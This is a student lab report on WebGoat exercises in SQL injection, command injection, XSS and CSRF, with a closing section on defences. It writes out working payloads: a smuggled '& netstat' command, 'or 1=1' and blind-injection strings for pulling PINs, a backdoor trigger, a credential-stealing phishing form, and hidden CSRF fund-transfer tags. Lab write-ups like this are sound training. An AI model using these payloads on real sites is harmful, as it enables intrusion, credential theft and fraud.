2019-2020 20174318张致豪《网络对抗技术》Exp9 Web安全

时间:2020-05-23 20:13:59   收藏:0   阅读:73

Exp8 Web基础

前期准备


一、实验目标与基础知识

1.1 实践目标

  • 做不少于7个关于SQL,XSS,CSRF的实验

1.2 基础知识

SQL注入

  • 通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串达到欺骗服务器执行恶意的SQL命令,即利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句;
  • 输入的用户名‘ or 1=1#中#相当于注释符,把后面的内容都注释掉,1=1是永真式,条件永远成立,和代码中select语句组合后变成select * from login5121_table where username=‘‘ or 1=1# ‘ and password=‘‘,不管密码是否输入正确,都能够成功登录。

XSS攻击

  • 跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets,CSS)的缩写混淆,XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中,比如这些代码包括HTML代码和客户端脚本,攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy),这种类型的漏洞由于被黑客用来编写危害性更大的phishing攻击而变得广为人知。

CSRF(Cross-site request forgery)

  • CSRF(Cross-site request forgery)跨站请求伪造,也被称为“One Click Attack”或者Session Riding,通常缩写为CSRF或者XSRF,是一种对网站的恶意利用。尽管听起来像跨站脚本(XSS),但它与XSS非常不同,XSS利用站点内的信任用户,而CSRF则通过伪装来自受信任用户的请求来利用受信任的网站。与XSS攻击相比,CSRF攻击往往不大流行(因此对其进行防范的资源也相当稀少)和难以防范,所以被认为比XSS更具危险性

实验步骤


一、WebGoat

技术图片

  • WebGoat默认使用8080端口,开启前先查看端口是否被占用: netstat -tupln | grep 8080

技术图片

  • 再有该文件的在命令行输入 java -jar webgoat-container-7.0.1-war-exec.jar 开启WebGoat

技术图片

  • 运行一段时间之后命令行出现Starting ProtocolHandler 证明开启成功

  • 打开浏览器访问localhost:8080/WebGoat

技术图片

  • WebGoat默登陆成功后发现左侧无选项:

技术图片

  • 如果左侧未出现课程则重新下载jdk,原因是编译后的java程序与Linux上的java Se版本不一致而产生的错误,解决方法如下:

  • 下载jdk1-8

  • 建立目录,将下载的jdk复制过去并解压

技术图片

  • 配置环境变量:vim /etc/profile ,复制以下代码到文件结尾
JAVA_HOME=/usr/local/java/jdk1.8.0_161
PATH=$PATH:$HOME/bin:$JAVA_HOME/bin
export JAVA_HOME
export PATH

技术图片

  • 通知系统java的位置

技术图片

  • 设置默认JDK

技术图片

  • 重新载入profile

 技术图片

  • 然后就能正常运行了

二、SQL注入攻击(Injection Flaws)

1.Command Injection(命令注入)

  • 技术概念:命令注入攻击对任何一个以参数驱动的站点来说都是一个严重威胁。

  • 原理:在正常的参数提交过程中,添加恶意的代码,往往能够得到以外的收获。

  • 目标:能够在目标主机上执行任何系统命令

操作方法:

  • 在左侧菜单栏中选择 Injection Flaws->Command Injection

  • 右键点击复选框选择Inspect Element审查网页元素对源代码<option>进行修改,在复选框中任意一栏的代码后添加"& netstat -an & ipconfig"

技术图片

  • 点击 View 可以看到网络端口使用情况和 IP 地址

技术图片

2、Numeric SQL Injection(数字型SQL注入)

  • 技术概念 :SQL 注入攻击对任何一个以数据库作为驱动的站点来说都是一个严重威胁

  • 原理:在 station 字段中注入特征字符,能组合成新的 SQL 语句。

SELECT * FROM weather_data WHERE station = [station]

  • 目标:查看所有的天气数据。

操作方法:

  • 在左侧菜单栏中选择 Injection Flaws->Command Injection

  • 右键点击复选框选择 Inspect Element 审查网页元素对源代码<option>进行修改,在在选中的城市编号value="101"后添加or 1=1

技术图片

  • 点击Go!显示所有天气数据

技术图片

3、Log Spoofing(日志欺骗)

  • 原理:这种攻击是在日志文件中愚弄人的眼睛,攻击者可以利用这种方式清除他们在日志中的痕迹

  • 目标:灰色区域代表在 Web 服务器的日志中的记录的内容,我们的目的是使用户名为“admin”的用户在日志中显示“成功登录”

操作方法:

  • 利用回车0D%和换行符%0A让其在日志中两行显示

  • 在User Name中填入webgoat%0d%0aLogin Succeeded for username: zzh20174318

  • 点击Login可以看到webgoat Login Fail,自己添加的zzh20174318 Login Succeeded

技术图片

4、String SQL Injection(字符串型注入)

  • 目标 基于查询语句构造自己的SQL注入字符串,显示所有信用卡信息

操作方法:

  • 使用提前闭合"",插入永真式1=1--注释掉后面的内容
  • 输入查询的用户名yb‘ or 1=1--select表里面的所有数据

技术图片

5、LAB: SQL Injection

  • 目标:使用 SQL 注入绕过认证

操作方法:

  • 右键点击页面,选择inspect Element审查网页元素对源代码进行修改,将password密码框的最大长度限制改为20

技术图片

  • 以用户Neville登录,输入密码hj‘ or ‘1‘ = ‘1,攻击成功,得到所有人员列表

技术图片

6、Database Backdoors(数据库后门)

  • 主题:如何创建数据库后门
  • 原理:数据库通常作为一个 Web 应用程序的后端来使用。此外,它也用来作为存储的媒介。 它也可以被用来作为存储恶意活动的地方,如触发器。触发器是在数据库管理系统上调用另 一个数据库操作,如 insert, select, update or delete。举个例子:攻击者可以创建一个触发器, 该触发器在创建新用户时,将每个新用户的 Email 地址设置为攻击者的地址。
  • 目标:我们的目标是学习如何利用查询的脆弱性创建触发器。由于 WebGoat 使用的是 MySQL 数据库,不支持触发器,所以该课程不会真正完成。 我们的 Login ID 是 101。

操作方法:

  • 输入101,得到该用户的信息

技术图片

  • 输入注入语句101; update employee set salary=8000执行两个语句

技术图片

  • 输入101;CREATE TRIGGER myBackDoor BEFORE INSERT ON employee FOR EACH ROW BEGIN UPDATE employee SET email=‘chaowendao@outlook.com‘WHERE userid = NEW.userid  注入一个充当SQL后门的触发器

技术图片

  • 分析:

    • BEFORE/AFTER参数指定了触发执行的时间,在事件之前或是之后

    • FOR EACH ROW表示任何一条记录上的操作满足触发事件都会触发该触发器,也就是说触发器的触发频率是针对每一行数据触发一次

7、Blind Numeric SQL Injection(数字型盲注入)

  • 原理:某些 SQL 注入是没有明确返回信息的,只能通过条件的“真”和“假”进行判断。攻击者必须充分利用查询语句,构造子查询语。

  • 目标:下面的表单允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或假)测试检查数据库中其它条目信息。

操作方法:

  • 本实验中,服务端页面返回的信息只有两种:帐号有效或无效。因此无法简单地查询到帐号的PIN数值。尽管如此,我们可以利用系统后台在用的查询语句SELECT * FROM user_data WHERE userid=accountNumber;

  • 如果该查询语句返回了帐号的信息,页面将提示帐号有效,否则提示无效。使用 AND 函数,我们可以添加一些额外的查询条件。如果该查询条件同样为真,则返回结果应提示帐号有效,否则无效。

  • 输入查询语句101 AND 1=1 ,因为两个条件都成立,所以页面返回帐号有效

技术图片

  • 输入查询语句101 AND 1=2,因为第二个条件不成立,所以而页面返回帐号无效

技术图片

  • 针对查询语句的后半部分构造复杂语句101 AND ((SELECT pin FROM pins WHERE cc_number=‘1111222233334444‘) > 10000 );

技术图片

  • 如果页面提示帐号有效,说明PIN>10000,否则PIN<=10000;不断调整数值,可以利用二分法,最终判断出PIN数值的大小为2364

技术图片

8、Blind String SQL Injection(字符串型盲注入)

  • 目标:下面的表单允许输入一个帐号,并检测该帐号是否合法。使用该表单的返回信息(真或 假)测试检查数据库中其它条目信息。
    我们的目标是找到 pins 表中 cc_number 字段值为 4321432143214321 的记录中 pin 字段的数值。pin 字段类型为 varchar。输入找到的数值(最终的字符串,注意拼写和大写)并提交,通过本课程。

操作方法:

  • 本节内容与上一节很类似,最大的不同是要查询的字段是一个字符串而不是数值
  • 输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=‘4321432143214321‘), 1, 1) < ‘H‘ );取得 pin 字段数值的第一个字母,并判断其是否比字 母“H”小

技术图片

  • 经过多次测试比较0-9、A-Z、a-z等字符串和页面的返回数据,判断出第一个字符为J,同理继续判断第二个字符,输入101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number=‘4321432143214321‘), 2, 1) < ‘h‘ );

技术图片

  • 最终的都正确PIN字段Jill输入验证

技术图片

三、XSS攻击

1、Phishing with XSS 跨站脚本钓鱼攻击

  • 技术概念:在服务端对所有输入进行验证总是不错的做法。当用户输入非法 HTTP 响应时容易造成 XSS。在 XSS 的帮助下,您可以实现钓鱼工具或向某些官方页面中增加内容。对于受害者来说很难发现该内容是否存在威胁。
  • 原理:如果有权限操作页面源代码,那么 HTML 文档的内容是可以被篡改的。
  • 目标:创建一个 form,要求填写用户名和密码。将数据提交到黑客服务器
  • 在搜索框输入如下代码,页面增加一个表单
<head>
<body>
<div>
<div style="float:left;height:100px;width:50%;"></div>
<div style="float:left;height:100px;width:50%;"></div>
</div>
<div style="height:200px;clear:both;"></div>
 
</div></div>
</form>
  <script>
function hack(){ 
XSSImage=new Image;
XSSImage.src="http://localhost:8080/WebGoat/catcher?PROPERTY=yes&user=" + document.phish.user.value + "&password=" + document.phish.pass.value + "";
alert("attack.!!!!!! Your credentials were just stolen. User Name = " + document.phish.user.value + " Password = " + document.phish.pass.value);
} 
  </script>
<form name="phish">
<br>
<br>
<HR>
  <H2>This feature requires account login:</H2>
<br>
  <br>Enter Username:<br>
  <input type="text" name="user">
  <br>Enter Password:<br>
  <input type="password" name = "pass">
<br>
  <input type="submit" name="login" value="login" onclick="hack()">
</form>
<br>
<br>
<HR>
</body>
</head>
  • 输入用户名和密码,读取在表单上输入的用户名和密码信息并发送给捕获这些信息的WebGoat

技术图片

技术图片

2、存储型XSS攻击(Stored XSS Attacks)

  • 原理: 这种攻击常见于论坛等留言平台,用户留言的时候输入一段JavaScript脚本,这段脚本就会被保存在数据库中。因为是留言,所以任何用户在打开网页的时候,这个脚本就会被从数据库中取出来而运行。
  • 目标:创建非法的消息内容,可以导致其他用户访问时载入非预期的页面或内容

操作方法:

  • 在title中任意输入字符,留言板中输入<script>alert("You‘ve been attacked!az az az az az az az");</script>后点击Submit攻击成功

技术图片

3、反射型XSS攻击(Reflected XSS Attacks)

  • 技术概念:在反射的XSS攻击中,攻击者可以使用攻击脚本创建一个URL,并将其发布到另一个网站、通过电子邮件或其他方式让受害者点击它。
  • 目标:通过使用攻击脚本创建一个URL,并将其发布到另一个网站,通过电子邮件引诱用户点击实现攻击

操作方法:

  • 输入代码<script>alert("You‘ve been attacked!!azazazazaz");</script>,点击purchase的同时页面就给出了反馈

技术图片

技术图片

  • 这里火狐浏览器弹没有弹出警告框

四、CSRF攻击

1、跨站请求伪造(Cross Site Request Forgery (CSRF))

  • 原理:跨站请求伪造是一种让受害者加载一个包含网页的图片的一种攻击手段。如下代码所示:
<imgsrc="https://www.mybank.com/me?transferFunds=5000&to=123456"/>
  • 当受害者的浏览器试图呈现此页面时,它将使用指定的参数向www.mybank.com的“me”端点发出请求。浏览器将请求链接以获得图像,即使它实际上是一个资金转移功能。提交请求时,浏览器将添加与站点相关的所有cookie。因此,如果用户对站点进行了身份验证,并且拥有永久或当前会话cookie,那么站点将无法将其与合法的用户请求区分开来。通过这种方式,攻击者可以让受害者执行他们不打算执行的操作,比如“购买物品”,或者脆弱网站提供的任何其他功能。

操作方法:

  • 查看页面右侧Parameters中的src和menu值,分别为324和900

技术图片

  • 在title中输入任何参数,message框中输入<img src="http://localhost:8080/WebGoat/attack?Screen=324&menu=900&transferFunds=5000" width="1" height="1" />,以图片的的形式将URL放进Message框,这时的URL对其他用户是不可见的,用户一旦点击图片,就会触发一个CSRF事件,点击Submit提交

    • 宽高设置成1像素的目的是隐藏该图片
  • 在Message List中生成以Title命名的链接(消息)。点击该消息,当前页面就会下载这个消息并显示出来,转走用户的5000元,从而达到CSRF攻击的目的。

技术图片

2、绕过 CSRF 确认( CSRF Prompt By‐Pass)

  • 主题:实现跨站请求伪造攻击(CSRF),包括通过多个请求绕过用户确认脚本命令

  • 原理:跨站点请求伪造(CSRF/XSRF)是一种攻击,它欺骗受害者加载包含“伪造请求”的页面,以便使用受害者的凭据执行命令。提示用户确认或取消命令可能听起来像一个解决方案,但如果提示符是可编写脚本的,则可以忽略它。本课展示如何通过发出另一个伪造的请求来绕过这样的提示符。这也适用于一系列提示,例如向导或发出多个不相关的伪造请求。

操作方法:

  • 查看页面右侧Parameters中的src和menu值分别为326和900

技术图片

  • 并在title框中输入学号,message框中输入代码:
<iframe src="attack?Screen=326&menu=900&transferFunds=5000"> </iframe>
<iframe src="attack?Screen=326&menu=900&transferFunds=CONFIRM"> </iframe>

技术图片

  • 在Message List中生成以Title命名的链接,点击进入后,攻击成功

技术图片

实验总结


一、基础问题回答 

(1)SQL注入攻击原理,如何防御

『 SQL注入攻击是把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,来达到欺骗服务器执行恶意SQL命令的目的。

防御方式:

  • 使用参数化筛选语句   “--”、“” 等等
  • 注入关键字的过滤   例如用正则表达式
  • 区分权限  普通用户与系统管理员用户的权限要有严格的区分
  • 数据库加密  使用一些安全参数 』

(2)XSS攻击的原理,如何防御

『 XSS攻击是利用网页开发时留下的漏洞,将恶意代码植入网页,使用户加载并执行攻击者恶意制造的网页程序。攻击成功后,可以进行越权操作、获取私密网页内容、会话和cookie等各种内容

防御方式:

  • 提前对需要的参数进行过滤检测
  • 对输入框做长度限制
  • 在后台对数据进行过滤
  • 消除网站的XSS漏洞,需要网站开发者运用转义安全字符等手段。

(3)CSRF攻击原理,如何防御

『 CSRF攻击是通过伪装成受信任的用户,利用他们的请求来访问攻击受信任的网站

防御方式:

  • 设置浏览器不记住用户账号密码  
  • 添加随机验证  每一个重要的post提交页面,使用一个验证码
  • 网页账号定时注销  规避一个账号使用到底

二、实验总结与体会

       本次实验通过WebGoat学习了SQL、XSS、CRSF相关的知识,了解了关于它们的多种攻击方式,实验做完后就感觉上网被攻击的风险挺大的,平时更是需要注意保护个人的信息。

       本次实验做完后终于不用写博客了。通过一系列的学习,本学习对网络攻防有了进一步的理解与掌握,本来对这门学科是没有什么主观上的看法的,好多的东西之前都没有接触过,在各个实验与课堂里,慢慢接触后发现这门课是非常有趣的,那些看似复杂的语句、看似晦涩的知识,实际上都很好理解。虽然实验做完了,但学习并没有结束,也希望在日后能用到本学期实验中的相关知识理论与技术手段。

评论(0
© 2014 mamicode.com 版权所有 京ICP备13008772号-2  联系我们:gaon5@hotmail.com
迷上了代码!